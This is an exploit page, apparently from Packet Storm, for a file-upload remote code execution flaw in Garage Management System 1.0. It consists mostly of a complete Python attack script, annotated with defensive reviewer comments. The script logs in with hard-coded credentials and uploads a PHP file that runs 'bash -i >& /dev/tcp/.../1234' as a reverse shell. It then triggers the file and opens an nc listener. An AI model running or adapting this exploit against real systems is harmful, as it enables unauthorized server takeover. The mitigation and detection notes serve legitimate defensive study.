
Garage Management System 1.0 Shell Upload

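Garage Management System version 1.0 suffers from a remote shell upload vulnerability. According to the proof of concept below, an authenticated user can submit a file with a .php extension through the product image field of createProduct.php and then request it under assets/myimages/, which results in remote code execution on the web server.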

Packet Storm
#sql#vulnerability#php#rce#auth
# Exploit Title: Garage Management System Remote Code Execution via File Upload
# Date: 24/07/2022
# Exploit Author: saitamang
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/sites/default/files/download/mayuri_k/garage.zip
# Version: 1.0
# Tested on: Centos 7 + MySQL
#
# Reviewer summary (defensive reading of this proof of concept):
#   * Flow shown below: authenticate at login.php, send a multipart POST to
#     php_action/createProduct.php with a .php file in the `productImage`
#     field, then GET that file name under assets/myimages/.
#   * Only the client side is visible here. For the final GET to run code, the
#     application presumably stores the upload under a web-served directory
#     with its original name and extension -- confirm against the PHP source.
#   * Mitigation: allow-list image extensions and verify content server-side,
#     store uploads under a server-generated name outside the web root (or
#     disable script execution in the upload directory), and replace the
#     credentials this script relies on.
#   * Detection: multipart POSTs to createProduct.php whose `productImage`
#     file name does not end in an image extension, requests for *.php under
#     assets/myimages/, and the web server process spawning a shell or opening
#     outbound TCP connections.

# NOTE(review): `string` and `concurrent.futures` are imported but not used in
# the code visible on this page.
import requests, subprocess, string, sys, warnings, time, concurrent.futures
from requests.packages.urllib3.exceptions import InsecureRequestWarning
# Silences urllib3's certificate warnings; every URL built below is plain http.
warnings.simplefilter('ignore',InsecureRequestWarning)
from netifaces import interfaces, ifaddresses, AF_INET

# One shared session, so the cookie set by the login response is sent with the
# upload request and the final GET.
req = requests.Session()

# Local intercepting-proxy settings. Defined but never passed to any request
# in this script.
proxies = {
    'http':'http://127.0.0.1:8080', 
    'https':'http://127.0.0.1:8080',
    }

def login(ip,username,password):  
    """Post the credentials to login.php and continue only on success.

    Success is detected by the literal text 'Login Successfully' in the
    response body. The upload step therefore requires an authenticated
    session: the issue is reachable by any account that can log in, not by
    anonymous visitors.
    """
    target = "http://%s/garage/garage/login.php" %ip
    data = {'username':username,'password':password, 'login':''}
    response = req.post(target, data=data)
    if 'Login Successfully' in response.text:
        print("[$] Success Login :)")
        trigger_rce(req)
    else:
        print("[$] Failed Login :(")

def creata_rs():
    """Write the file that is later uploaded, saitamang.php, to the working directory.

    Enumerates local interfaces with netifaces and acts only on one named
    exactly "eth0"; its IPv4 address(es) are embedded in the PHP one-liner
    together with the fixed port 1234. Defenders can read the payload string
    as an indicator: a PHP `exec` call that starts bash with a /dev/tcp
    redirection, i.e. an outbound connection from the web server.
    """
    for ifaceName in interfaces():
        # setdefault supplies a placeholder entry when the interface has no IPv4 address.
        addresses = [i['addr'] for i in ifaddresses(ifaceName).setdefault(AF_INET, [{'addr':'No IP addr'}] )]
        if ifaceName=="eth0":
            ipadd = ' '.join(addresses)
            f = open("saitamang.php", "w")
            payload = "<?php exec(\"/bin/bash -c 'bash -i >& /dev/tcp/"+str(ipadd)+"/1234 0>&1'\")?>"
            f.write(payload)
            f.close()
        else:
            pass

def trigger_rce(req):
    """Upload saitamang.php as a product image, then request it from the image directory.

    `req` is the authenticated session. `ip` is not a parameter: it is read
    from the module-level name assigned in the `__main__` block.

    The request that matters for detection and for the fix is the multipart
    POST to createProduct.php: the `productImage` part carries the file name
    "saitamang.php". The script's last request fetches that same file name
    under assets/myimages/, which suggests the server keeps the client-supplied
    name and extension -- confirm in the application's upload handler.
    """
    creata_rs()
    target = "http://%s/garage/garage/php_action/createProduct.php" %ip
    # (None, value) entries are sent as ordinary form fields; only
    # productImage is sent as a file part.
    multipart_form_data = {
    "currnt_date": (None,""),
    "productImage": ("saitamang.php", open("saitamang.php", "rb")),
    "productName" : (None,"test"),
    "quantity" : (None,"1"),
    "rate" : (None,"1"),
    "brandName" : (None,"1"),
    "categoryName" : (None,"1"),
    "productStatus" : (None,"1"),
    "create" : (None,"")
    }
    response = req.post(target, files=multipart_form_data)
    print("[$] Enjoy your RCE :)")
    # Requesting the uploaded file is what would make the server interpret it as PHP.
    req.get("http://%s/garage/garage/assets/myimages/saitamang.php" %ip)

if __name__ == "__main__":
    # ASCII-art banner.
    print("   _____       _ __                                   ")
    print("  / ___/____ _(_) /_____ _____ ___  ____ _____  ____ _")
    print("  \__ \/ __ `/ / __/ __ `/ __ `__ \/ __ `/ __ \/ __ `/")
    print(" ___/ / /_/ / / /_/ /_/ / / / / / / /_/ / / / / /_/ / ")
    print("/____/\__,_/_/\__/\__,_/_/ /_/ /_/\__,_/_/ /_/\__, /  ")
    print("                                             /____/   \n\n")
    
    try:
        ip = sys.argv[1].strip()
        # Hard-coded credentials, presumably the application's shipped
        # defaults -- rotating them removes the precondition this script
        # depends on.
        # NOTE(review): the username literal reads "[email protected]" on this
        # page; presumably the hosting site's e-mail obfuscation replaced the
        # original value.
        username = "[email protected]"
        password = "rootadmin"
        # Opens a separate terminal window running a netcat listener on port
        # 1234, the same port written into the uploaded file.
        subprocess.call(['terminator', '-e', 'nc -lvp 1234'])
        time.sleep(2)
        login(ip,username,password)
        
    except IndexError:
        # Raised by sys.argv[1] when no target address was given.
        print("[-] Usage %s <ip>" % sys.argv[0])
        print("[-] Example: %s 192.168.100.x" % sys.argv[0])
    # Sits outside the try/except, so it runs on every path, including after
    # a completed run.
    sys.exit(-1)
